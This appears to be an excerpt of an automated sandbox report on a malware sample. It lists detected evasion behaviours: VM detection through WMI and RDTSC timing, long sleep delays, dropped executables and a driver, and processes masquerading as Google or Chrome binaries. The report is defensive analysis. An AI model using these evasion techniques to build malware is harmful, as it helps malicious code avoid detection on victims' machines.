Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 0000000003304B4D second address: 0000000003304B5C instructions: 0x00000000 rdtsc 0x00000002 movzx dx, bl 0x00000006 bswap eax 0x00000008 inc cl 0x0000000a setnle dh 0x0000000d xor bl, cl 0x0000000f rdtsc
Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 0000000002FDF2D0 second address: 0000000002FDF2DF instructions: 0x00000000 rdtsc 0x00000002 movzx dx, bl 0x00000006 bswap eax 0x00000008 inc cl 0x0000000a setnle dh 0x0000000d xor bl, cl 0x0000000f rdtsc
Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 000000000312C131 second address: 000000000312C135 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 pop ecx 0x00000004 rdtsc

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe TID: 5856	Thread sleep count: 9999 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6132	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6132	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6136	Thread sleep count: 9490 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5004	Thread sleep count: 9371 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe TID: 1252	Thread sleep count: 2901 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 2984	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe TID: 2856	Thread sleep count: 1207 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5176	Thread sleep count: 988 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500	Thread sleep count: 8845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4700	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep count: 9207 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5004	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 5160	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\GoogleUpdate.exe TID: 5608	Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\GoogleUpdate.exe TID: 5020	Thread sleep time: -40960s >= -30000s
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 2148	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4696	Thread sleep count: 4863 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168	Thread sleep count: 1139 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656	Thread sleep count: 7649 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5304	Thread sleep time: -8301034833169293s >= -30000s

Source: C:\Users\user\AppData\Local\Google\ofg.exe	Thread sleep count: Count: 2901 delay: -10			Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Thread sleep count: Count: 1207 delay: -10			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-5575

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Window / User API: threadDelayed 9999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 9490	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9371	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Window / User API: threadDelayed 2901	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Window / User API: threadDelayed 1207	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8845
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9207
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4863
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7649

Source: C:\Users\user\AppData\Local\Google\brave.exe

API coverage: 9.6 %

Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\5528.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\571D.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: vbc.exe, 00000002.00000003.421782393.0000000004F27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ModuleAnalysisCache.21.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000015.00000003.434510255.000001AA45783000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxmlWrit
Source: ModuleAnalysisCache.21.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000015.00000003.434510255.000001AA45783000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: ModuleAnalysisCache.21.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: vbc.exe, 00000002.00000002.437948756.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.421782393.0000000004F27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fl.exe

Code function: 43_2_003A715D GetSystemInfo,

43_2_003A715D

